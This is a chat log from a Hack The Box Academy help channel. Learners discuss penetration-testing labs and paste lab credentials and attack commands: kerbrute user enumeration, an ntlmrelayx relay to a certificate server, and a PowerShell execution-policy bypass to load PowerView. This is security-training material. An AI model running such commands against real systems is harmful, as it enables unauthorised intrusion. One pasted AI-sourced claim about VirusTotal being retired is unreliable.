Also try on the parrot VM from htb I've heard people who had the same issue for some reasons and fix it by switching VPN file or doing it from HTB VM

crystal lantern
#

ok, let me try on HTB VM with --script dns-nsid

brave field
crystal lantern
#

run : nmap 10.129.149.23 -T1 -sS -sV -sU -p 53 --script dns-nsid --source-port 53 -v -Pn -n @ HTB VM

#

its successful

#

thanks @hidden ledge and @brave field

#

.

#

but why it succesed this time, and not in my own kali machine

#

?

brave field
#

which VPN server? I am on EU 5

crystal lantern
#

eu 3

hidden ledge
#

I don’t know but you are not the only one who had the issue

crystal lantern
#

ok, we can leave it, its done naa,,,why wasting brain power on unneccessy things

deft hollow
#

Does anyone has completed the HTB AI Red Teamer path? I need some guideline regarding that

obsidian meteor
#

On the module Windows Event Logs & Finding Evil on the first one.The first question says Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: TW__.exe
I have connected with RDP and opened windows event viewer.I also found the log on 8/3/2022 at 10:23:2025 but i dont see anything close to the answer format.
Can someone help me please

fathom pendant
#

you start with the logon event; and follow up

solar leaf
#

Hello Everyone on the Skills Assessment - SQL Injection Fundamentals I tried all the injection payloads and Nothing is working

fossil sequoia
#

hello i need help on Password Attacks Module (Pass the Ticket (PtT) from Linux)

heady sapphire
#

Help with skill assessment II of attacking common applications first question : find the URL of the Wordpress instance

brave field
#

Anyone did the Skills Assessment - File Upload Attacks? Correct me if I am wrong, the PNG extension fails the MIME test because it's intentional or is it just me? Thanks.

fathom pendant
fathom pendant
#

¯_(ツ)_/¯

#

also the module is above tier 0, so please avoid spoilers

#

could be that it just doesn't accept pngs, it's been a minute since i've done it

brave field
fathom pendant
wide river
#

hey, i this where i can ask about subscription matter ?

heady sapphire
#

I am in attacking common applications skill assessment . I can’t find credentials for the third vhost I have discovered . Any help? I tried brute forcing the password and using the default username

fathom pendant
compact patrolBOT
finite sable
#

Does anyone can help me with module: Windows Attacks & Defense
Page 15
Section: PKI - ESC1
I can't send file cert.pfx to WS001 couse idk how ❗️

quaint marsh
#

guys I need help with Attacking Common Applications - Attacking WordPress

terse sedge
#

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

quaint marsh
quaint marsh
wild sage
#

John isn't the user you need to brute force

finite sable
#

WHO CAN HELP ME WITH ""PKI - ESC1" in CDSA module "Windows Attacks & Defense? 😐

#

Thats my last questions

#

Anyone

astral jay
#

Can someone help me with "Skills Assessment - WordPress" section of WordPress module? I don't understand one thing - exercise states that public facing website is on Wordpress, but in any way I can't find anything related to wordpress on that site - no meta, no wordpress related directories, no readme, no license and subpages are html files (which should rather be PHP on wordpress). I also tried IP reverse lookup even dirbuster, but this didn't help me in any way. Should this look like this? I don't want exercise answers that much, because I want to learn by doing it myself, but I'm questioning whether or not this is expected

#

Okay, I realized something during writing above

#

There was info about "Linux DNS mapping" in the module and there actually was one URL that didn't work

#

I had to add it to /etc/hosts and now I have access to some wordpress blog

sturdy sandal
#

Hi all, need to clarify something. how to open an elevated PowerShell ? When using "Run as administrator" I get the following error which sounds weird...

round shadow
#

What is the name of the network interface that MTU is set to 1500?

Please help me

quaint marsh
cold hawk
#

Open the alert "[InsightNexus] Admin Login via ManageEngine Web Console." Find the foreign IP address starting with "203" in the comments. Check VirusTotal for the information related to this IP address, and add the details as a comment in this alert. In VirusTotal, what is the name of the file starting with "Mango" in the Files Referring section? So that is the question, but where is the Files Referring Section?

#

So did they take off the Files Referring section no VirusTotal?

viscid bolt
#

Currently doing Windows Server Update Services (WSUS) on || Compromise the DC01 using WSUS. Submit the flag located at C:\WSUS\flag.txt || Curious on how to force an update on the DC?

patent sky
#

Hello there, i am stuck here : Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. Can i dm someone ? The reverse shell isn't working. I have this message : Command executed with process ID 3684 on DC01 But no reverse shell. I don't know what i am doing wrong

cloud urchin
#

@zinc pumice Please take care not to post content from modules above tier 0, like attack paths etc

zinc pumice
lapis bridge
#

Hi, I am doing Getting Started, Knowledge Check Question. I used msfconsole and succesfully exploited getsimple, my question is i am having difficulty doing privilege escalation, any hints/links to resources would be appreciated, This is my first question if i am posting it on wrong channel, please guide to the correct one, thank you for your help 🙂

brave field
lapis folio
#

Hi folks.

I am doing LLMNR/NBT-NS Poisoning - from Linux

There is a question to run hashcat to crack the hash, and submit the cleartext password as your answer.

I ran it on attacker01 machine, but it gave this error


error: unknown target CPU 'generic'

* Device #1: Kernel /usr/local/share/hashcat/OpenCL/shared.cl build failed.```
lapis folio
proper parrot
#

I'm current doing "Attacking Active Directory and NTDS.dit".

I'm trying to find valid usernames.

I have a text file that has usernames using || username-anarchy ||

I'm using ||kerbrute|| with the command
|| kerbrute userenum --dc machine_IP --domain inlanefreight.local gen2.txt ||

I'm getting KDC ERROR wrong realm which means I have the wrong domain.

Note that I only followed the domain used on the module. What could I be doing wrong? What domain should i use?

#

I also tried using another version with command || kerbrute_linux_amd64 userenum --dc 10.129.12.127 --domain inlanefreight.local gen2.txt ||. Same result

brave field
proper parrot
proper parrot
#

Got it now. I'm still apparently using the wrong domain. I ran || nmap scan || and it showed me the right one.

novel valve
#

Anyone can help me in the graphql attacks module with sql injection? cant input the payload right
I tried it now 2 days and i dont figure out.
DM me would be better.

round shadow
#

What is the name of the network interface that MTU is set to 1500?

Please help me

proper parrot
round shadow
proper parrot
#

Read the whole line of each interface result. You would see the answer

wooden ivy
#

Well, I found out that it's working with a real device but not with an emulator. Both the newest Frida version and the one used in the module do not find the native lib on an emulated device, while it works on a real device

quaint marsh
#

Guys I am stuck since yesterday on [Attacking Common Applications Module | Attacking WordPress Section]. I found the username and password for the /wp-login.php , But when I use them on msfconsole , it says payload upload failed.

wild sage
#

Try using some of the other RCE vulnerabilities. Did you also try just logging in with that user?

leaden island
#

yo guys

#

im on file uploads - blacklist extensions section
i found out allowed extensions, and im trying them one by one, but none seems to be executed by php

silk lagoon
lavish cedar
#

Anyone can help on Network Foundations -> Skills Assessment -> Chapter 3. - Target Acquired (OPTIONAL)?

I'm supposed to:

  1. nmap -p21,80 -sC -sV <target ip>

  2. nc <target ip> 21

  3. USER anonymous[Ctrl+V][Enter][Enter]
    PASS anything[Ctrl+V][Enter][Enter]
    PASV[Ctrl+V][Enter][Enter]

  4. nc -v <target ip> <dynamic port>

On 4th there's the problem; Last two passive mode numbers are 194 and 13.

The calculation is supposed to be 194*256+13 = 49677 aka the dynamic port, but it doesn't work.

#

it's supposed to return:

#

But it returns:

leaden island
brave field
leaden island
#

i was planning to use ngrok but np

brave field
leaden island
#

i was doing it wrong, yell heah

sudden lodge
quick pulsar
#

I'm working throught the penetration tester course and I'm on "Windows Privilege Escalation: Windows Server". For some reason both xfreerdp and rdesktop(rdesktop -u htb-student -p HTB_@cademy_stdnt! [IP Address]) aren't working. anyone have any advice? I am using pwnbox to try and connect. nothing on the forums is helping either 😕

lavish cedar
#

This question was asked several times, many times left unanswered and apparently, some guy stated that you have to be super fast for it to work.

Just tried that and I got a few steps further.

#

Now im supposed to do:

LIST[Ctrl+V][Enter][Enter]

and

RETR[Ctrl + V][Enter][Enter]

#

which returns invalid number of parameters

sudden lodge
lavish cedar
iron cipher
#

I am having an issue with getting the vnc password, in the skill assessments part of the windows lateral movement, i am pretty sure, i have to port forward to forward to get where i am going but i can’t find any ports open can someone dm me if they can help.

spring viper
#

Can anyone provide some assistance with the LLM Output Attacks Skill Assessment?

spring viper
#

hi can I ask for help on the skills assessment

azure plinth
#

Hello, for the cracking passwords with hashcat section on cracking wireless handshakes with hashcat i'm having a little trouble with the hashcat-utils.git. I git clone the hashcat-utils, cd into the hashcat-utils/src, and when doing the make command within the terminal it doesn't really compile anything and returns an error. Apparantly its something about a rule with the cap2hccapx.c thats its not able to make a target for. The screenshot will probably help a bit more with what I'm dealing with, but I would definitely like to try and get this working for the module.

fathom pendant
amber sentinel
#

Hello

terse sedge
#

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

spring viper
fervent peak
#

i'm stuck on the last part of the skills assessment for the "Introduction to Advanced CSRF & XSS Exploitation" module.

i have identified ||the SQLi, and dumped the table names.||

||the only table that stands out is "files", and when i try dumping stuff in it i keep getting {"error":"Something went wrong"}.||

any help would be massively appreciated

gritty anvil
#

i'm doing the "SQL Injection Fundamentals" skills assessment and i’m kinda losing my mind lmao
i got the first SQLi working fine, then found a second injection point

i managed to:
map the db/tables/columns
confirm _ table exists
confirmed there's a user called 'admin'
but i can’t get the answer to
“What is the password hash for the user 'admin'?”
i tried using SUBSTRING(), ASCII(), even a subselect inside a CASE WHEN, but it keeps throwing 500 errors

am i just making this 10x harder than it needs to be 😅

opaque stump
#

I need help , I am in AD trust attacks , in "SID Filter Bypass (CVE-2020-0665)" I can't connect to sql02 , I did set it up proxychains and ssh D tunnel ?

steep rose
storm skiff
fervent peak
fathom pendant
#

The module is above tier 0, so be mindful of that or take to dms

opaque stump
fathom pendant
fathom pendant
opaque stump
fathom pendant
#

the help here is community driven ¯_(ツ)_/¯

opaque stump
fathom pendant
#

Higher tier modules are less likely to have someone have completed them (tier 3 and up); if your ask gets buried you can bump it/reask

opaque stump
#

I will bump this time, thank you for your response and guidance 🙂

fathom pendant
#

The ad trust attacks module yeah? I've been slowly setting up the burner to get back into studying

terse sedge
#

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

opaque stump
cloud urchin
opaque stump
# cloud urchin I don't recall the module specifically, but in my notes I never needed to direct...

yes , we need to setup a SSH dynamic tunnel , then we have to use proxychains to enumerate SQL02 , I already added sql02 in my /etc/hosts. also my tunnel is up but still I am getting this error ? "File "/usr/local/lib/python3.11/dist-packages/impacket/nmb.py", line 907, in _setup_connection
    raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
OSError: [Errno Connection error (172.16.118.11:445)] timed out"

opaque stump
cloud urchin
opaque stump
cloud urchin
#

ok

cold hawk
#

As an FYI on use Google Threat Intelligence is what I was told from AI that VirustTotal no longer has a file reference anymore. The Relations tab was removed from VirusTotal as part of its migration into Google Threat Intelligence (GTI), which is replacing VirusTotal as a standalone product.
Here's what’s happening and why it matters:

🧠 What Changed and Why
• VirusTotal is being phased out: As of 2025, Google is retiring VirusTotal as a standalone platform and migrating users into Google Threat Intelligence (GTI).
• GTI introduces new features: These include curated threat actor profiles, campaign reports, and a new score for indicators of compromise (IoCs).
• Legacy features like the Relations tab are being deprecated: The Relations tab, which showed connections between files, domains, URLs, and IPs, is no longer available in the GTI interface. This is likely due to GTI’s shift toward curated intelligence rather than raw community-driven data.

#

Nvm Google Threat Intelligence does not currently offer a direct file referral program like VirusTotal’s legacy public submission and sharing model. However, it provides private scanning and API-based submission workflows for enterprise use.
Here’s how to approach file submission and referral-like workflows in Google Threat Intelligence (GTI), especially if you're transitioning from VirusTotal:

stone vault
#

Hi, I’m stuck on NoSQL Injection – Skills Assessment 2 in the CWEE path. I’ve already enumerated the valid username, but I can’t progress any further, none of the three endpoints seem to react to NoSQLi payloads (dot/bracket notation, $ne, $regex, JSON bodies, URL-encoded forms, timing, etc.). Everything returns the same “missing parameter” messages, and I can’t get any vector to trigger different behavior. Could someone give a small hint on what general direction or payload format I should be focusing on next (dot notation, JSON, x-www-form-urlencoded, etc.)? Thanks!

storm skiff
cloud urchin
#

@tough gorge Please take care not to post content from modules above tier 0. Make sure to state which module/section/question you're on, what you need help with, what you tried etc. If you feel like you need to reveal more info you can ask someone to take it to DM's.

lusty trench
#

I am doing the module - Active Directory & Attacks, and I'm stuck on the lab for ACL Enumeration. I need to use PowerView.ps1, but whenever I try to run it, all I get are errors. I've reset the machine three times, and I've also downloaded a fresh copy of PowerView.ps1. I've never encountered these problems before. I even used powershell -ep bypass -nop -c, but even though I don't get any ouput, when I run a PowerView command, then I get errors again.

gray yacht
proper parrot
#

I'd like to ask whose idea it was to put || Pivoting tunneling || technique in Password attack assessment when that topic is 2 modules after Password attacks? What's the thought process on that?

cloud urchin
#

where'd they do that?

#

the ptt from linux section?

#

the section shows you what to do, you don't really need the whole pivoting module

tribal lark
#

i was wondering if some could explain why on case 8 of sqlmap fundamentals in the instuctions it has --csrf-token="token" as the command but does not work but works when you use --csrf-token="t0ken" i dont know if this is a spoiler or not or a mistake in the command

#

sqlmap version 1.9.11.3#dev

cloud urchin
#

It says right there on the page, a non-standard token name is used

#

it's just the name of the parameter for the token

#

it is by design

tired locust
#

Hello everyone

#

I tried to solve the question which is related to wayback machine in the web edition section of penetration tester path.The question is about paypal.com.The answer should be Palm Organizer according to wayback machine result but it didn't accept that answer

#

Can u help me please?

tribal lark
#

@cloud urchin i dont see where it says those words or maybe am half asleep lol

cloud urchin
tribal lark
pale island
tired locust
pale island
pale island
vagrant wraith
#

@fathom pendant Hi am iallowed to talk about the issue ? cause the thing ive tried one method and it worked back then but smh when i tried to to do it again im getting errors for some reason

hidden ledge
#

Hello could some give me a little nudge for the AD Enum & Attack skill assessment II for this question: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

I'm system on SQL01 but can't pivot on MS01 with hashes I dumped 🙁

gray yacht
hidden ledge
#

Didnt find creds on SQL01 yet i'll try again

gray yacht
hidden ledge
#

Well I dumped local hashes and looked for creds with Lazagne,snaffler and manually but didn't succeed

#

Hashes seems useless in order to pivot

#

I'll try responder

crimson moon
#

Can anybody share their AD Enum notes? I feel like mine is disorganised af

candid field
#

Hi, can help with signature wrapping attack for SAML?

quaint marsh
quaint otter
#

anybody doing eighteen machine?? im hard stuck at the very beggining trying to enumerate the db... did the impersonate to that user and tried some stuff but nothing

brave field
#

redo if you need to

nimble tangle
#

hello

#

can someone assisst me with the Phishing in the xss module the payload works just fine and i can intercept the tested creds but however i encode the script it always says url invalid

jaunty vortex
fathom pendant
fathom pendant
#

The OSI and TCP/IP stacks are core to understanding how certain components interact

#

like is the tunnel acting at layer 4 or layer 3; does it operating at a different layer impact its functionality and capabilities

jaunty vortex
#

read allat will take a long time for me

fathom pendant
#

comprehension >>>>> speed

jaunty vortex
#

aight

#

thank you

fathom pendant
#

your skills fall apart if you build them on a shaky foundation

#

the stronger your foundation, the less you have to go back and 'relearn' things that you should have learned first

proper parrot
#

What's the usual solution to this? I'm doing pass the hash exercise from Password attacks. I reconnected multiple times, spawned target multiple times as well. Even set mtu to 1200., reconnect VPN... Still the same issue SOLVED changed VPN file

golden plume
#

heyy fellas
I am stuck at linux privilege escalation skill assessment Flag2
I am little stuck and I need a little nudge.

turbid inlet
dim path
#

Stuck here can anyone can explain

turbid inlet
#

Ok guys, this might be a dumb question, but where can I view all modules that Ive "favourited" i.e. clicked the heart icon on? Im about to start the Getting Started module in the Penetration Tester career path, and have "favourited" all the modules Im lacking prior knowledge which are listed as prerequisite for this one, from the description. Id like to work through those first.

Also, separate question, also possibly dumb/due to my non-understanding of the way the platform works, but I started the career path with 120 cubes, and was under the understanding that completing a module gives back all the cubes needed to unlock it, however I now have only 80 cubes. Could anyone please shed some light on these question?

Thanks!

cloud urchin
#

Completing the module gives 10% of the cubes back I think

#

i think tier 0 costs 10 to unlock and you get them all back, but not the higher modules

turbid inlet
#

Are the modules in the career paths not all free?

cloud urchin
#

no, most aren't

turbid inlet
#

Ahh ok, how can I distinguish the free from non-free? Not that it will affect what I try to complete, but so i can more effectively plan buying the cubes needed

cloud urchin
#

actually i think you get 20% not 10% of higher tiers

#

tier 0 is "free", costs 10 cubes, gives 10 cubes back

#

anything above that is like 20% return on cubes

turbid inlet
#

ahhh i see. the Penetration Testing Process module is T1 but the next one, Getting Started is T0, so thats where I got confused. I had it in my mind that modules would follow an ascending Tier progression as you progress through a path. Thanks!

#

Do you happen to also know where I can find the favourited modules?

cloud urchin
#

idk

fathom pendant
#

Ive done the monster math on it a bit

tough gorge
boreal karma
#

For linux priv esc special permissions, the answer seems to be buggy.

#

This file should work for both answers because the setuid and setgid bits are set

boreal karma
#

I solved it and found the other two binaries, but that was a bit annoying

cloud urchin
#

What steps did you take to "run powerview.ps1"?

cloud urchin
#

try importing it first then running a cmdlet

late rapids
#

Is that how I was supposed to do this and I'm misunderstanding, or was this a bypass thing?

lusty trench
# cloud urchin try importing it first then running a cmdlet

PS C:\Users\htb-student\Downloads> Import-Module .\PowerView.ps1
Import-Module : File C:\Users\htb-student\Downloads\PowerView.ps1 cannot be loaded. The file
C:\Users\htb-student\Downloads\PowerView.ps1 is not digitally signed. You cannot run this script on the current
system. For more information about running scripts and setting execution policy, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1

  • Import-Module .\PowerView.ps1
  •   + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
      + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
tranquil breach
#

Hello all

#

Active directory enumeration: DCSync attack , i'm stuck there.
I tried secretdump.py with adunn credential to dump hashs but it don't work.

I also connected to ACADEMY-EA-MS01 using xfreerdp and try to make dcsync attack with mimikatz . but it still don't work.

The question is unclaire for me.
Some one to help

cloud urchin
lusty trench
# cloud urchin You still need to use execution bypass

Okay, this finally got it to work: Set-ExecutionPolicy Bypass -Scope Process -Force; Import-Module 'C:\Users\htb-student\Downloads\PowerView.ps1' But why was this necessary? Why can't you just transfer over PowerView.ps1 and run it like normal?

cloud urchin
#

It's not a standalone script you just run, you use the cmdlets it has

civic inlet
oak raptor
#

Introduction to Windows Evasion Techniques: Open-Source Software
i tried to manipulate CorExeMain and mscoree.dll but it doesn't work

subtle coral
#

Guys, what am I missing there? Web Proxy>Burp Intruder section

autumn pilot
#

You have a typo

subtle coral
#

On where?

#

‘/admin’ ?

tranquil breach
silk lagoon
hidden ledge
#

.

ocean night
#

Uh

obsidian meteor
#

No it doesnt works

ocean night
#

@obsidian meteor @hidden ledge please remove those flags

#

That is a tier 1 module

#

Read the channel subject

hidden ledge
#

Sorry

obsidian meteor
#

Sorry

hidden ledge
#

Didn't pay attention]

obsidian meteor
#

Should i delete all the post?

#

or?

ocean night
#

🤷‍♂️ I'd suggest taking it to DMs if someone is up for giving you a nudge

#

Thanks

obsidian meteor
ocean night
#

No worries

gloomy spindle
#

Hi, I am having a problem win DACL Attacks II > SPN Jacking (https://academy.hackthebox.com/module/255/section/2911) There is a point in which we have to create a ticket with rubeus using the credentials of the target machine (SRV01$ and its NTLM hash), but it is not said how they got those creds. We have to do the same for another machine, but I don't know how to get its hash. Can anyone help me?

ruby whale
woven zenith
#

I'm working on "Kerberoasting - from Windows" exercises which is to crack the certain spn account. I'm wondering why rubeus and powerview command give different hash. I was able to crack the hash provided by rubeus but the powerview one is throwing error when trying to crack them using hashcat.

Powerview:
PS C:\Tools> Get-DomainUser -Identity svc_xxx | Get-DomainSPNTicket -Format Hashcat

Rubeus:
PS C:\Tools> .\Rubeus.exe kerberoast /tgtdeleg /user:svc_xxx /nowrap

wicked nimbus
#

Hello Everyone, I am in the CPTS course topic: Pivoting, Tunneling, and Port Forwarding, Under Dynamic Port Forwarding with SSH and SOCKS Tunneling, where you are expected to perform rdp through proxychain into the victim machine (the last question in the section). If all the steps are followed as per the dynamic port forward, the nmap results show no ports found as they are filtered. I was able to connect the system directly through proxychain , but my question is, how to go about if the port is filtered and not showing up in the scan,

gloomy spindle
gray yacht
# woven zenith

If you copied the output from the terminal running PowerView, it likely has spaces.

woven zenith
#

^ if you look closely to the image I share. the two hash is different. 1st one starts 09F and ends 417D, while the powerview starts 7E8 and ends 70C1

brave field
woven zenith
#

Yeah that's indeed. correct. I'm just wondering why rubues and powerview produce different results.

#

Well nevermind. I reset the lab and do it again. right now in my current test I am getting same result for both tools.

little pecan
#

This is the SIEM Visualization Development module, the SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe) section. I added the row @timestamp to get the "common date," but it's saying that my answer is wrong. I am not sure what I am doing wrong here, is it that @timestamp not what I think it is or what?

fathom pendant
little pecan
#

I just changed it to "days" and refreshed, but the table's results did not change

#

Well, this is weird. I changed the "Absolute" dates on the calendar from Mar 1 -> now to Mar 1 -> Mar 31 and that obtained a new value

#

The new value got accepted, but I have no idea why a new value was obtained in the table to begin with kek

opal hound
#

hi everyone, can someone help me with the last question of Pass the Certificate (a lesson in Password Attack module). i keep encoutering the same issue with impacket-ntlmrelayx -t http://10.129.234.172/certsrv/certfnsh.asp --adcs -smb2support --template DomainController after i ran printerbug.py to authentication against my kali machine
[*] GOT CERTIFICATE! ID 19
Exception in thread Thread-6:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
self.run()
....

hidden ledge
#

I used --template KerberosAuthentication and it worked fine

quartz sundial
subtle coral
fiery cosmos
#

(Footprinting Iab - hard) i UDP scanned the box and got SNMP, and version scan said “SNMPv3” but it still uses community strings??

#

But I thought only SNMPv2c uses community strings?

fathom pendant
#

Also that module is above tier 0 from what I recall, so the solution shouldnt even be posted anywhere

fiery cosmos
#

Sorry

#

So sometimes nmap scans can give results that are wrong?

fiery cosmos
#

How was I supposed to know it isn’t really version 3🤨?

fathom pendant
#

Its also mentioned in the reading that devices may use v2 strings as they transition to v3

fiery cosmos
#

Lemme check

#

Actually it says “many organizations are still using SNMPv2, as the transition to SNMPv3 …”

fiery cosmos
strong moon
#

guys plz i need help api attacks skill assessment even when i upload a pdf file i still get the same error i tried different sizes but same error

fathom pendant
marsh echo
#

hello

neon nova
#

Hello everybody! I can't find the target ip in the Incident Handling Process course, in the Cyber Kill Chain module. Can you help me?

fathom pendant
fathom pendant
strong moon
fathom pendant
#

@neon nova "Click here to spawn target!"

#

Right next to Target(s):

neon nova
#

I'm blind, thanks.

fathom pendant
#

Np

neon nova
#

I spent 2 hours searching for this button 🤣

marsh echo
#

i successed fck one detail it was important to take care of braindamage

strong moon
#

gonna break out in any minuteNotLikeThis

covert schooner
#

Hi i am unable to figure out this question of the "Reversing Hybrid applications" section of the "Android Static analysis" module.
Any nudge for the same?

sick meteor
#

Hi. I'm stuck on the Skills Assessment for the Session Security module. I've managed to get the session identifier for the superadmin but the 'change-visibility' call is returning a 401 unauthorized - i can't tell if this is expected or if something went wrong on the challenge itself

#

Any direction would be appreciated.

leaden yew
#

I'm having an issue with connecting via RDP to the provided VM in "Windows Attack & Defense - Kerberoasting" module/section.

└─$ xfreerdp /v:10.129.194.237 /d:eagle /u:bob /p:Slavi123 /dynamic-resolution
[14:08:58:053] [49877:49878] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[14:08:58:053] [49877:49878] [WARN][com.freerdp.crypto] - CN = WS001.eagle.local
[14:08:58:255] [49877:49878] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D] from server
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core.nla] - SPNEGO failed with NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D]
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

Anyone available to help?

I've restarted the VM several times too. I've also tried xfreerdp /v:10.129.194.237 /u:eagle\\bob /p:Slavi123 /dynamic-resolution

quasi wave
#

for incident handling process module's skills assessment question 1, I found the IP address in the comment in the alert. I am trying to navigate to that IP address but the page will never load. I tried it with http not https because https obviously isn't gotta work

#

can someone help me out?

#

in fact the connection loads out

tame apex
#

Hi noob here, I ssh onto the win machine PS console I Put in Get-ADuser but when I want to type -Filter or - anything it goes invisible what I type after

tough gorge
fathom pendant
quasi wave
#

hi I asked several hours ago with the skills assessment and someone in DMs tried to help me but they can't find the answer either. is anyone who has done CDSA available for DM?

#

I'm wondering what I should do at this point

#

I literally completed the first module, and then the second one and then they added the skills assessment to first module

#

so need to complete

#

what do you recommend I do?

#

should I just go onto the next module and come back to it later?

quasi wave
#

hi has anyone done the skills assessment for the incident handling process?

#

and if so can I get help with it?

cloud urchin
quasi wave
#

but it gave no results

#

on VT

#

VT had nothing on the IP

#

I also tried multiple other things

#

I also don't have the file

#

actually I looked it up in VT first, THEN tried navigating to the IP as a backup

#

neither worked

#

not that navigating to the IP was smart but I thought someone else in this chat had done it so I tried to do it

cloud urchin
#

@rustic sage Please take care not to post content from the modules above tier 0, especially skill assessments. Your post had the IP of a machine you have to pivot to.

cloud urchin
round surge
#

Is there an issue with the Active Directory DCSync module when trying to RDP into the Attack Host? I am unable to RDP / SSH into the box to actually work through the questions.

cloud urchin
round surge
#

I will try to change regions, I tried through VPN first thinking it was my kali box, then tried over on the PWNBOX and still had no luck.

round surge
#

I keep on getting the following error when trying to RDP into the attack host. I also try to SSH and says authentication failed.

#

this is after I have switched regions and VPN Servers.

quasi wave
#

Sorry I was trying not to spoil so I used Xs

#

But that one is wrong one?

#

Hold on wait let me try something else tonight

#

When I get back from boxing

#

I think I know what I’m doing wrong. Silly me

#

If so I was asking a very silly question

cloud urchin
quasi wave
#

so I'm about to try something else tho

#

with that same IP

#

I think I see what I'm doing wrong here

#

wait solved

#

thanks

civic fiber
#

Did you solve it?

quasi wave
#

great I finished the section

#

I'm onto the next section tomorrow

civic fiber
slate palm
#

Same problem. Did you resolve it? I try to change the port the server is running on and map the ssh accordingly to port 9090 and start debugging. However, debugging won't break when entering localhost:9090, the UI is returned normally though. Appreciate any help, I stuck at this for half a day now 🥲

hearty galleon
#

uh can anyone help ," What is the difference between the two numbers of the learning progress mentioned above?"

supple knot
#

Hello.. I'm stuck in the SQLi Fundamentals module's skills assessment :(
It's ridiculous how I tried everything and no payload worked 👍 no spoil just wanna know if somebody just solved it recently

hasty mauve
#

Module: DACL Attacks II
Section: Skills Assessment
Question: Compromise DC04 and read the flag located at C:\Users\Administrator\Desktop\flag.txt

I have no Idea how to get to DC04.
I have access to || tangui || user but I do not know how am I supposed to reach DC04.
I've literally abused every single technique taught in the module to reach where I currently am, except for sAMAccountName spoofing since the DC is not vulnerable.
What else there is to try? can someone help please?

hasty mauve
#

Thanks

hasty mauve
#

Get-DomainGPO fails because it calls Get-Forest which fails too since the domain is not linked to a forest (at least that's what the error says).

frosty hazel
hasty mauve
kind lance
#

"Hi everyone, I need some help with the 'Using the Metasploit Framework' module, Section 11.

I'm trying to use the exploit/windows/iis/iis_webdav_upload_asp as instructed, but the target's Port 80 is persistently CLOSED.

Steps I've taken:

Connected via VPN (tun0 is up).

Reset the machine multiple times.

Terminated and spawned a fresh new instance.

Waited 5+ minutes for services to boot.

Current Status: nmap -Pn <Target_IP> shows ports 135, 445, 3389, and 5985 are OPEN, but Port 80 is CLOSED.

Since the exploit requires WebDAV on port 80, I cannot proceed. Is this a known issue with the instance spawning, or is there a trick to wake up the IIS service on this box? Thanks!"

fathom pendant
fathom pendant
kind lance
#

The module is 'Using the Metasploit Framework'. Section 11 is named 'Meterpreter'.
​The instructional text explicitly uses the exploit/windows/iis/iis_webdav_upload_asp targeting IIS 6.0. However, the spawned instance has Port 80 CLOSED and ports 445/5985 OPEN, which looks like a more modern Windows potentially vulnerable to EternalBlue, but I am trying to follow the guide

hidden ledge
#

From what I see you are not looking at the right port

#

Scan every ports you can

winter shell
#

Hello! i am having a problem in module password attacks Pass the Ticket (PtT) from Linux

#

i am on this specific question Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

#

i am trying to import the ccache in the current session but for some reason when i run klist the ticket is not imported.

hidden ledge
#

Did you export the file to the KRB5CCACHE env variable?

winter shell
#

yes!

#

but for now i have another problem ! i try to do sudo su from svc_workstations but i get this "unable to resolve host linux01.inlanefreight.htb: Temporary failure in name resolution"

winter shell
#

i copy it and exported it an run klist but still nothing

faint hill
#

I did the cookie fuzzing exercize in the "ZAP Fuzzer" section of "Using Web Proxies". I tried a ridiculous number of attempts using ZAP but nothing worked. Given that the logic of the question is fairly easy to follow the implication of the hashing of the usernames in the word list is simply ||that substituting one of these as a cookie in the relevant location will render the flag||.

In the end I just ||stuffed the cookie in chromium developer tools and got the flag that way||. So much for Zap proficiency.... Despite understanding the question and having "proof of concept " -as it were- I couldn't get ZAP to give up the goods.

proper parrot
#

Can someone explain where did this ccache file came from? I'm so confused. It's not on the list
Pass the Ticket (Linux) (Password attacks)

winter shell
proper parrot
#

I see i see. I was just wondering. "Where'd that came from?" LOL

#

Thanks!

lavish cedar
lavish cedar
blazing cloak
#

Hey guys, any1 having problems with spawning machines? Is it related to cloudflare issue?

proper parrot
#

Yeah. I think its still happening.

#

Same here. Machine died and now I can't spawn

#

welp

blazing cloak
#

F

marble quiver
#

I cant spawn machines too

leaden yew
# leaden yew I'm having an issue with connecting via RDP to the provided VM in "Windows Attac...

